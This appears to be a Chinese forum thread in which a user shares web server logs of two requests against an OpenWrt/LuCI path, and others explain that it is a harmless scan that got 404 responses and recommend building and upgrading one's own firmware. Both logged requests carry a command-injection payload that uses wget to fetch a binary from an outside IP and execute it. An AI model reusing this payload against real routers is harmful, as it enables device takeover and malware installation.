Benladen
(Benladen)
1
179.43.190.218 - - [26/Apr/2024:02:00:05 +0100] “GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm±rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm±rf+shk) HTTP/1.1” 404 146 “-” “Go-http-client/1.1”
45.142.182.92 - - [26/Apr/2024:02:26:07 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.163.214.97/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 146 "-" "Go-http-client/1.1"
Benladen
(Benladen)
3
@“James”#p24114 我的小服务器的日志啊,要中病毒了:xhj11:
James
(James)
4
@“[未知用户]”#p24115 这是被扫了,不用管。这个扫的其实是openwrt, /cgi-bin/luci 是 openwrt 的路径。 返回404就是没找到。
James
(James)
6
openwrt是家用路由系统,很多玩路由的都会刷固件。所以不要随便刷外边的固件。可能留有后门,被扫到的话就可能像论坛之前的mjj一样文件全部被锁,需要花钱解。
Benladen
(Benladen)
7
@“[未知用户]”#p24116 OP 这么可怕?要是有这个路径就直接get文件并执行了?
OP我从来不用别人的,都是自己编译的。想要什么功能自己加,也不担心会有后门。
James
(James)
9
@“[未知用户]”#p24123 是的,这样安全。但是也要定期升级版本。
laozhang
(老张)
10
@“[未知用户]”#p24124 这个我还没有注意,一两年没有升级了。
James
(James)
11
@“[未知用户]”#p24125 OP好像漏洞不少的,如果有大洞没被也容易出问题,所以定期升级也有必要
laozhang
(老张)
12
@“[未知用户]”#p24128 我现在内核版本还是5.15的,之前也有说过这个版本稳定性较好。所以也就没有换。